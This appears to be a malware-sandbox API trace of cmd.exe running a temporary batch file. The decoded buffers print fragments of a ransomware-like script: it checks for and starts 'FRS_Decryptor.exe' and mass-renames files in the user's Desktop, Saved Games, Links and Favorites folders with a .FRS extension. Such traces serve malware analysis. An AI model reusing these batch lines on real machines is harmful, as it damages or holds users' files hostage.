hProcess=0x260, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0080.629] CloseHandle (hObject=0x260) returned 1 [0080.629] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0080.629] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0080.629] GetEnvironmentStringsW () returned 0xd2c668* [0080.629] FreeEnvironmentStringsA (penv="=") returned 1 [0080.629] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0080.629] GetEnvironmentStringsW () returned 0xd30508* [0080.629] FreeEnvironmentStringsA (penv="=") returned 1 [0080.629] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0080.629] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0080.629] _close (_FileHandle=3) returned 0 [0080.629] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.629] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0080.630] _get_osfhandle (_FileHandle=1) returned 0x28 [0080.630] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0080.630] _get_osfhandle (_FileHandle=0) returned 0x24 [0080.630] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0080.630] SetConsoleInputExeNameW () returned 0x1 [0080.630] GetConsoleOutputCP () returned 0x1b5 [0080.630] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0080.630] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.630] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0080.631] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0080.631] _get_osfhandle (_FileHandle=3) returned 0x158 [0080.631] SetFilePointer (in: hFile=0x158, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0080.631] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0080.631] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0080.631] SetFilePointer (in: hFile=0x158, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0080.631] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0080.631] GetFileType (hFile=0x158) returned 0x1 [0080.631] _get_osfhandle (_FileHandle=3) returned 0x158 [0080.631] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0080.631] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0080.631] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0080.632] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0080.632] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0080.632] GetFileType (hFile=0x158) returned 0x1 [0080.632] _get_osfhandle (_FileHandle=3) returned 0x158 [0080.632] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0080.632] _tell (_FileHandle=3) returned 2627 [0080.632] _close (_FileHandle=3) returned 0 [0080.632] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0080.632] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0080.632] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0080.632] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0080.632] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0080.637] feof (_File=0x76ea4c68) returned 0 [0080.637] ferror (_File=0x76ea4c68) returned 0 [0080.637] fgets (in: _Buf=0xd82600, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0081.124] feof (_File=0x76ea4c68) returned 0 [0081.124] ferror (_File=0x76ea4c68) returned 0 [0081.124] fgets (in: _Buf=0xd8792e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0081.161] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0081.161] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43bf6, cbMultiByte=78, lpWideCharStr=0xd43ba8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0081.162] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0081.162] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0081.162] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0081.162] _open_osfhandle (_OSFileHandle=0x2f0, _Flags=8) returned 3 [0081.162] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.162] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0081.162] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.162] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0081.162] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0081.162] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.162] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0081.162] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.162] GetFileType (hFile=0x2f0) returned 0x1 [0081.162] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0081.162] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0081.162] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0081.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0081.163] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.163] GetFileType (hFile=0x2f0) returned 0x1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0081.163] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0081.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0081.163] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.163] GetFileType (hFile=0x2f0) returned 0x1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0081.163] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.163] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.163] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.163] GetFileType (hFile=0x2f0) returned 0x1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.163] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0081.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0081.163] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.163] GetFileType (hFile=0x2f0) returned 0x1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0081.163] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0081.163] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0081.163] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.163] GetFileType (hFile=0x2f0) returned 0x1 [0081.163] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0081.163] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0081.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0081.164] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.164] GetFileType (hFile=0x2f0) returned 0x1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0081.164] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0081.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0081.164] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.164] GetFileType (hFile=0x2f0) returned 0x1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0081.164] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0081.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0081.164] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.164] GetFileType (hFile=0x2f0) returned 0x1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0081.164] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0081.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0081.164] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.164] GetFileType (hFile=0x2f0) returned 0x1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0081.164] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0081.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0081.164] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0081.165] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.165] GetFileType (hFile=0x2f0) returned 0x1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0081.165] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0081.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0081.165] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.165] GetFileType (hFile=0x2f0) returned 0x1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0081.165] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.165] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.165] GetFileType (hFile=0x2f0) returned 0x1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0081.165] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0081.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0081.165] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.165] GetFileType (hFile=0x2f0) returned 0x1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0081.165] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0081.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0081.165] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.165] GetFileType (hFile=0x2f0) returned 0x1 [0081.165] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0081.165] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0081.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0081.166] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.166] GetFileType (hFile=0x2f0) returned 0x1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0081.166] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0081.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0081.166] _get_osfhandle (_FileHandle=3) returned 0x2f0 [0081.166] GetFileType (hFile=0x2f0) returned 0x1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0081.166] ReadFile (in: hFile=0x2f0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0081.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0081.166] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 